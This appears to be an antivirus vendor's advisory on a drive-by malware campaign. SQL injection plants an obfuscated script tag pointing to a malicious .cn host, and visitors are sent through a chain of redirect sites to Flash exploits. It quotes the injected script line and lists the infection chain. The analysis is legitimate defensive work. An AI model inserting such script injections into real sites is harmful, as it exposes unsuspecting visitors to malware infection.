The exploit doesn't manifest any obvious symptoms. It usually appears on clean sites trough SQL Injection attacks which insert an invisible iframe in the once clean code that leads the unconscious Internet surfer to an "outbreak" infected site.
This attack has a new approach. Here is an example of this kind of injection : <script src="hxxp://%76%63%63%64%2e%63%6e/"></script>. This leads to the infected site hxxp:// vccd.cn.
The mechanism behind the infected site is shown below.
It's always better to prevent : keep the antivirus updated, as well as any application that you might use.
Please let BitDefender disinfect your files.
The mechanism used by this kind of malware spreading campaigns is rather simple and thus, effective. First it finds vulnerable sites and tries to inject infected code into their databases. This is usually done by "SQL Injection" that inserts malicious code into the previously clean sites. This is similar to the method used by the "Asprox" / "Damnec" Trojan.
The malicious intent is obvious since it modifies the user posted code on the Internet. Not surprisingly, the URL that the user unconsciously follows is used for infection.
After the stealthy redirection to the infected outbreak site, for example hxxp://vccd.cn, it checks for browser settings and tries different exploits to infect the user.
Here is a list of infection flow that was found on this website. They lead to each and other trough iframes.
The first step :
* hxxp://vccd.cn/index.html - sets a cookie which expires in 1000 days and checks for the User-Agent. If it's Internet Explorer then it leads to hxxp://asp-18.cn/ilink.html else it leads to hxxp://asp-18.cn/flink.html. These two check for the version of Flash Player and if it's "9" with subversion older than "115" it downloads a SWF file (Adobe Flash extension) with the name "i[subversion].swf" for the first one and "f[subversion].swf" for the second. These are detected by BitDefender as Exploit.SWF.Gen. Then it points to another site that continues the infection hxxp://www.hxg006.cn/b2.htm.
* hxxp://www.hxg006.cn/b2.htm just leads to hxxp://asp-11.cn/a2/fxx.htm